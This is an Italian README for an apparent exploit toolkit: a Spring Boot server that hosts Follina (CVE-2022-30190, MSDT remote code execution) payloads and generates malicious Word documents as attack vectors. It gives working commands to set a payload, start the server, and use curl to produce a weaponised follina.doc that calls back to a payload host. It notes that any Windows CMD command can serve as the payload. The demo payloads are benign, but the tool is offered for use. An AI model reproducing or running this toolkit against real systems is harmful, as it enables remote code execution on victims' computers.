
Server per ospitare/attivare i payload di Follina e generatore di documenti Word dannosi che sfruttano il protocollo MS-MSDT. (CVE-2022-30190)
Questo repository contiene una semplice applicazione Spring Boot che funge sia da server per ospitare/attivare payload Follina, sia da generatore di documenti Word dannosi pronti per essere utilizzati come vettori d'attacco per sfruttare CVE-2022-30190.
Questa vulnerabilità consiste nell'Esecuzione di Codice Remoto tramite MSDT (Microsoft Windows Support Diagnostic Tool).
Per servire un payload unico a tua scelta, devi:
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Se desideri cambiare il payload corrente, devi prima abbattere il server attualmente attivo, e ripetere i passaggi dopo aver definito il nuovo payload.
NOTA: il payload può essere sostituito con qualsiasi altro comando, purché possa essere eseguito tramite il CMD di Windows.
Per servire un payload lato client a tua scelta, devi:
mvn spring-boot:run
cmd, ad esempio:curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
Il payload in questo caso è incorporato all'interno del documento e avrà semplicemente bisogno di attivazione contattando il server. In questo modo, puoi avere molteplici payload diversi distribuiti su documenti differenti e non dovrai riavviare il server per attivare cambi di payload – poiché puoi semplicemente generare un nuovo documento con il payload desiderato incorporato.
Molte grazie a John Hammond per aver creato l'implementazione Python e per aver condiviso la sua analisi della CVE.